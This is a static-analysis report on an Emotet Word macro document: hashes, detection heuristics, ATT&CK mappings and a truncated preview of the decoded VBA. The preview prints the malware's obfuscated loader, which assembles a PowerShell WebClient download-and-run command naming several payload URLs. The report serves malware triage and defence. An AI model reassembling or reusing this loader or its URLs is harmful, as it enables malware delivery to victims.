Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 18ed17ce41f9cf81…

MALICIOUS

Office (OLE)

90.0 KB Created: 2017-11-09 05:20:00 Authoring application: Microsoft Office Word First seen: 2017-11-13
MD5: e0aaf334411dc5572b7ba40da42f823f SHA-1: d4e6576e21a7278efc51ab548b2a4e71b28ad402 SHA-256: 18ed17ce41f9cf815f2f3fef40b2310e0d6d76bb4500f7589769173eb678a0b6
304 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains heavily obfuscated VBA macros, including an AutoOpen function, which is a strong indicator of malicious intent. The presence of a Shell() call and the ClamAV detection signature 'Doc.Macro.Emotet-6374344-0' strongly suggest this is an Emotet variant. The obfuscated script likely downloads and executes a secondary payload, a common tactic for Emotet.

Heuristics 9

  • ClamAV: Doc.Macro.Emotet-6374344-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Emotet-6374344-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.eoskin In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 51155 bytes
SHA-256: 7457b27062a023b1292959a1c5ab0e5383eb6b81e66a098a37e01b3745544d93
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 30 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "DFDBnUzTh"
Function PZukBFBaU()
unlNIsK = "" + hNVEqvv + Mid("naR]82+[cHaR]54),[stRING][cHaR]36).rE'+'plAcE(([cHaR]120+[cHaR]114+[cHaR'+3qw2JIdiw9zqiLs48QUo0WQsI80JbnYSKf", 2, 73) + ivIzYdo + OMlnnQt
LwwJZzo = "" + cHDpZvX + Mid("pHJ84fn58zh72rh;bxrh+xrhr'+'xrh+xrheaP4'+'v+P4vk;}'+'P4'+'v+P4vcaxr'+'h+xrhtch{write-hxrh'+'+xrhost cxrh+xrhw0_P4v+P4vxr'+'h+'+'x'+'rhJcmURSoNt2pZJfn", 14, 121) + fQYNwHi + YZRjtRa
WsrIBZGLk = "" + kzqwrHF + Mid("SYOqtzXlDBYZ']104),[stRING][cHaR]39).rEplAcE(P4v7qfP4v,[stRING]['+'cHaR]124)T32 IEx').R3cCY", 13, 75) + qXzLnDq + cDWkEcS
MKDkPj = "" + svaStwj + Mid("lkvfq4vVpu+xrjMWzwinfOO", 11, 3) + DRcPBdh + qCiHKkJ
URACwUPvOz = "" + KmiTSkf + Mid("Es3WloFvC2rhJ0+[CHAR]102),'+'[CHAR]39-rePLAce  xrhcw0xrh,[CHAR]36-CREplaCexrhhXoxrh,kmdX2AYsmE", 14, 71) + DoljFKH + smkEJzc
acKjSAsiDB = "" + YrSZNPw + Mid("TYQhSFrhuxrh'+'+xrhas =xrh+xrh xrAw0Vo LVCDO639Ghj8o3AjJoDK5sU5Di", 7, 27) + jOzMfvG + YzwLwXn
jqBKJP = "" + lklMnPk + Mid("Oimect rMucCJzzllAIRFmdaNKzGVXu6fXj4T", 4, 5) + wzlhbhC + VLQVEoT
ZOhwuwtH = "" + amjYzZL + Mid("E5Sw7NtV(mPfxrh+xrh,xrh+xrhmPx'+'rh+xrhfxrh+xrh)xrh+xrh;cw0karapas =xrh+xrh cw0nxrh+xrhsxrh+xrhaxrh+xrhdasd.nextxrh+xrh(xrh+xrh1, 34xrh+xrh3xrh+xrh24xrh+xrh5);xrh+xrhcw0xrh+P4v+P4vxrhhxrhP4v+P4v+x7T1h5oirGoEmjIl", 9, 188) + hVtziqY + itvZZbf
JrITL = "" + ljotwXp + Mid("8ELh.exrhP4v+P4v+xrhxem'+'Pfxrh+xrh;foxrh+xrhrexrh+xrhaxrh+xrhchxrh+'+'xrh(cw0abc iP4v+P4vxrh+xrhnxrh+xrh cwP4v+P4'+'vxrh+xr'+'hP4v+P4v0bcd){try{xrh+'+'xrhcw0xrhK5HwiHkn", 4, 158) + BRPLqnW + zSGkjzT
LSJZADdV = "" + lfdHkRE + Mid("a NCfPx'+'rh)  -rePLAce ([CHAR]109'+'+[CHP4v+P4vAR]8620JJF", 7, 46) + BWtszmQ + vGYlKXY
FLiiF = "" + GbOCJGu + Mid("GM9sSBIhmPf xrhP4v+PoMJ1n8aHsR9l", 8, 13) + wnMvuCl + KBolqNc
UMFcr = "" + WIOScGf + Mid("pKG3anxrh+xrhdxrh+xP'+'4v+P4vrhoxrh+P4v+P4vxrhmxrP4v+P4vh+xrh;cxrh+xrhw0bcdP'+'4v+P4v = mPfhttp://www.eoskin'+'.cnxrh+xrh/dxrh+xP4v+P4vrh/P4v+P4v,hxrh+'+'xrhttpxrh+xrh://'+'febaCIAYHZ2QdQWjhb22", 5, 173) + zLwRlRB + zctTwwf
vXjPSSldVY = "" + WYlVfwT + Mid("sTkGT9qK (' (P4v((xrhcw'+'0fxrh+xrhranc = new-oxrh+xrhbjectxrh+xrh SyP4v+P4vstem.Net.WebCli'+'enxrh+xrht;cxrh+xrhwxrh+xrhP4v+P4v0nsadxrh+xrhasxrh+xrhd '+'=xrh+xrh new'+'-'+'objULoDI", 9, 168) + iTsdpEJ + IPWDQmj
wLGlUErlBkI = "" + icRjRzF + Mid("rMX22I37ITwEpLAce('P4v',[sTRING][CHar]39).REpLAce(([CHar]84+[CHar]51+[CHar]50),'|') | &( $env:cOmSPec[4,15,25]-Join'')VIAFd", 12, 107) + kWQfQkw + LizsAji
XIFlMQR = "" + mhVilFF + Mid("2mGGV70lvC0PQY6ihtxrh+xr'+'hep.coxrh+xrhmx'+'rh+xrh/'+'Sxrh+x'+'rhSbTyrS/xrh+xrhmPf.Splxrh+xrhitY616Aaj", 18, 79) + jQIhpXR + GiSZmYH
zbTvYUJiX = "" + WSvcDlT + Mid("zTjkjinrhm/ilZxrh+xrh/xrh+xrh,P4v+P4vxrh+xr'+'hhxrh+xrhttpxrh+xrh:xrP'+azf09FJkfE0JJvQtpqkSiDqqYzXSnjv", 8, 64) + PUDLbUo + SiBIlEV
rqMSlCDaI = "" + iKVWOwv + Mid("fd[CHAR]92)7qf&( XR6sHeLLID[1]+XR6sheLLiD[13]P4v+P4v+xrhxxP4v+P4vrh)P4v).rEplAcE(([cHaR]88+[cHtovrqvj13zwC", 3, 92) + BJQcKch + vGjsuRp
jbEpSCN = "" + mPpYJbG + Mid("WbL7OtU'4v+P4vh+xrh//vixrh+xrhrtualdxrhP4v+P4v+xrhoorxrP4v+P4vh+xrhsNi7SD", 8, 61) + wjbtOoT + ZcwpLwv
jiYkGPpRpa = "" + CVINZRN + Mid("SQJqCMjYh3v4iBBD7XW0XjU4T3Js9vM4GJGu.nexrh+xrht/'+'YAqJxrh+xrh/xrh+xrh,htxrh+xrhtpxrh+xrh://www.emont-P4v+P4vdP4v+P4vnxr'+'h+xrhepr.xrh+xrhcom/'+'DZonxrh+xr'+'htEn/,httP4v+P4vp://www.ecobui'+'ldsolutionsxrh+xrhgh.coxrh+x5mt", 37, 184) + XEEuJhi + hrFCvLs
DbMzKwl = "" + jzZdMzM + Mid("NsoJ7JRboWKnzn9KYBh+x'+'rhcw0enxrh+xrhv:xrh+xrhpxrhP4v+P4'+'v+xrhublxrh'+'+xrhic +xP4v+P4vrhP4v+P4v+xP4v+P4vrh mPfhXoxrh+xrMDjPNJ", 19, 105) + YROVfRm + FfIIYdZ
bcOXuM = "" + cSwtNWf + Mid("M13oke-Ixrh+xrhtemxrh+P4v'+'+P4vxrh(cxrhP4v+P4v'+'+xrhw0xrh+'+'xrhhP4v+P4vuaxr'+'h+xr'+'hs)xrh'+'+xiiYbZr99DoTlFqHvvd7R0ZW8wzS", 4, 96) + ohGQMdC + brjwBUn
KSvpp = "" + JfQDjWo + Mid("aQwd8Zb),xrh+xrh cxrh
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.